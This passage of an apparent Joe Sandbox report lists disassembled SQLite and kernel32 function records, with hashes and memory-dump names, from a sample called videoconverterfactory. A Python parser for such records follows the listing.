                                                                                                      • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561EB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_soft_heap_limit64$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                      • String ID: soft_heap_limit
                                                                                                      • API String ID: 1251656441-405162809
                                                                                                      • Opcode ID: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                                                      • Instruction ID: 8891d4bbc0f5aef5547f00e3070395c34840fc2012d087b050684f6162b0ba7d
                                                                                                      • Opcode Fuzzy Hash: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                                                      • Instruction Fuzzy Hash: C2014B71A083188BC710EF98D8417ADB7F2BFA5318F508629E8A49B394D730DC42CF41
                                                                                                      APIs
                                                                                                      • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 6092522A
                                                                                                      • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 60925263
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_log
                                                                                                      • String ID: NULL
                                                                                                      • API String ID: 632333372-324932091
                                                                                                      • Opcode ID: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                                                                      • Instruction ID: 5a36de60e8574ea04015b231464f09686a41744340efbe7a8a869d8181b3dc96
                                                                                                      • Opcode Fuzzy Hash: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                                                                      • Instruction Fuzzy Hash: BAF0A070238301DBD7102FA6E44230E7AEBABB0798F48C43C95A84F289D7B5C844CB63
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterLeavefree
                                                                                                      • String ID:
                                                                                                      • API String ID: 4020351045-0
                                                                                                      • Opcode ID: 13d179c58506242de641c1793229aaf6d73ae3266bd26a3d41fb94aeb54caf06
                                                                                                      • Instruction ID: 980a39aab3b848caec2c27f45d5308e77b440585e3cd6ccd446b63c63d51e1b6
                                                                                                      • Opcode Fuzzy Hash: 13d179c58506242de641c1793229aaf6d73ae3266bd26a3d41fb94aeb54caf06
                                                                                                      • Instruction Fuzzy Hash: 2D018070B293058BDB10DF28C985919BBFBABB6308B20855CE499D7355D770DC80EB62
                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4DF
                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4F5
                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4FD
                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D520
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 682475483-0
                                                                                                      • Opcode ID: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                                                                      • Instruction ID: 6dd43474153c21470d2d90641e64b96ed0da30414b2d41baa8b5e8831fa3fcb2
                                                                                                      • Opcode Fuzzy Hash: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                                                                      • Instruction Fuzzy Hash: 9AF0F972A163104BEB10AF659CC1A5A7BFDEFB1218F100048FC6197354E770DC40D6A2
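The function records above follow a fixed text layout (a Similarity block with API/String/Opcode identifiers, then APIs, Strings and Memory Dump Source sections), which is what an analyst pivots on when correlating the SQLite-bearing module at 0x60900000 across reports. The parser below is an added example, not code from this report or from Joe Sandbox. It assumes each record begins at the "Similarity" header, and it decodes the .sdmp file name by treating the 16-digit field as the region base address and the following 8-digit field as a Windows PAGE_* protection value (both assumptions, chosen because 0x20 on the code region and 0x04/0x08 on the data regions match PAGE_EXECUTE_READ, PAGE_READWRITE and PAGE_WRITECOPY); the other name fields are kept raw. The sample input is an abridged excerpt of two records from this page.

```python
"""Parse Joe Sandbox per-function records into structured data (added example)."""
import re

# Constructed input: abridged excerpt of two records from this report.
SAMPLE = """\
Similarity
• API ID: sqlite3_value_blobsqlite3_value_bytes
• String ID: Invalid argument to rtreedepth()
• API String ID: 1063208240-2843521569
• Opcode ID: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
• Instruction Fuzzy Hash: 0FF0A4B2A0C2589BDB00AF2CC88255577A6FF24258F1045D9E9858F306EB34DDD5C7D1
APIs
• sqlite3_value_bytes.SQLITE3 ref: 6091A1DB
• sqlite3_value_blob.SQLITE3 ref: 6091A1FA
Strings
• Invalid argument to rtreedepth(), xrefs: 6091A1E3
Memory Dump Source
• Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
Similarity
• API ID: sqlite3_soft_heap_limit64$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_entersqlite3_mutex_leave
• String ID: soft_heap_limit
• API String ID: 1251656441-405162809
APIs
• sqlite3_soft_heap_limit64.SQLITE3 ref: 609561D7
  • Part of subcall function 6092A43E: sqlite3_initialize.SQLITE3 ref: 6092A450
  • Part of subcall function 6092A43E: sqlite3_mutex_enter.SQLITE3 ref: 6092A466
• sqlite3_soft_heap_limit64.SQLITE3 ref: 609561EB
Strings
Memory Dump Source
• Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
"""

# "name.MODULE(args), ref: ADDR" or "name.MODULE ref: ADDR", optionally prefixed
# with "Part of subcall function ADDR: ". The comma before "ref:" is optional
# because the report emits it only when an argument list is present.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>[^.\s(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")

# Assumed layout of the .sdmp name: proc.stage.dumpid.base.protect.f6.type.index
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-F]{8})\.(?P<stage>[0-9A-F]{8})\.(?P<dumpid>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.(?P<f6>[0-9A-F]{8})\."
    r"(?P<type>[0-9A-F]{8})\.(?P<index>[0-9A-F]{8})\.sdmp$")

# Windows memory protection constants (documented values).
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin"}


def parse_sdmp_name(name):
    """Decode a dump file name; protection decoding is an assumption (see lead-in)."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox .sdmp name: {name}")
    protect = int(m["protect"], 16)
    return {"base": int(m["base"], 16), "protect": protect,
            "protect_name": PAGE_PROTECT.get(protect & 0xFF, f"0x{protect:X}"),
            "executable": bool(protect & 0xF0),  # all PAGE_EXECUTE* values
            "raw": m.groupdict()}


def parse_api_line(line):
    """Parse one APIs bullet into name, module, argument list, ref and subcall address."""
    m = API_RE.match(line)
    if not m:
        raise ValueError(f"unrecognised API line: {line}")
    d = m.groupdict()
    d["ref"] = int(d["ref"], 16)
    d["sub"] = int(d["sub"], 16) if d["sub"] else None
    d["args"] = d["args"].split(",") if d["args"] is not None else []
    return d


def parse_records(text):
    """Split the report text at each 'Similarity' header and parse every record."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Similarity":
            rec = {"fields": {}, "apis": [], "strings": [], "dumps": []}
            records.append(rec)
            section = None
        elif rec is None or not line:
            continue
        elif line in SECTIONS:
            section = line
        elif line.startswith("•"):
            body = line[1:].strip()
            if section == "APIs":
                rec["apis"].append(parse_api_line(body))
            elif section == "Strings":
                s, sep, xrefs = body.rpartition(", xrefs: ")
                if sep:
                    rec["strings"].append((s, [int(x, 16) for x in xrefs.split(",")]))
            elif section == "Memory Dump Source":
                role, _, value = body.partition(": ")
                name = value.split(",")[0]
                rec["dumps"].append({"role": role, "name": name, **parse_sdmp_name(name)})
            else:  # Similarity/identifier fields and the IDA plugin snapshot name
                key, _, value = body.partition(":")
                rec["fields"][key.strip()] = value.strip()
    return records


def module_layout(records):
    """Unique (base, protection) pairs across all dumps, sorted by address."""
    seen = {(d["base"], d["protect_name"]) for r in records for d in r["dumps"]}
    return sorted(seen)


if __name__ == "__main__":
    for r in parse_records(SAMPLE):
        print(r["fields"].get("API String ID"), [a["name"] for a in r["apis"]])
    print(module_layout(parse_records(SAMPLE)))
```

Running it over the two sample records yields the API String IDs with their call lists (including the subcall entries, which carry the calling function's address in `sub`) and a layout of the dumped regions that separates the executable page at 0x60901000 from the writable page at 0x6097D000. Fed the full listing above, the same parser gives the complete region map of the module and a table of API call sites keyed by address, which is the raw material for cross-report matching on Opcode and Instruction IDs.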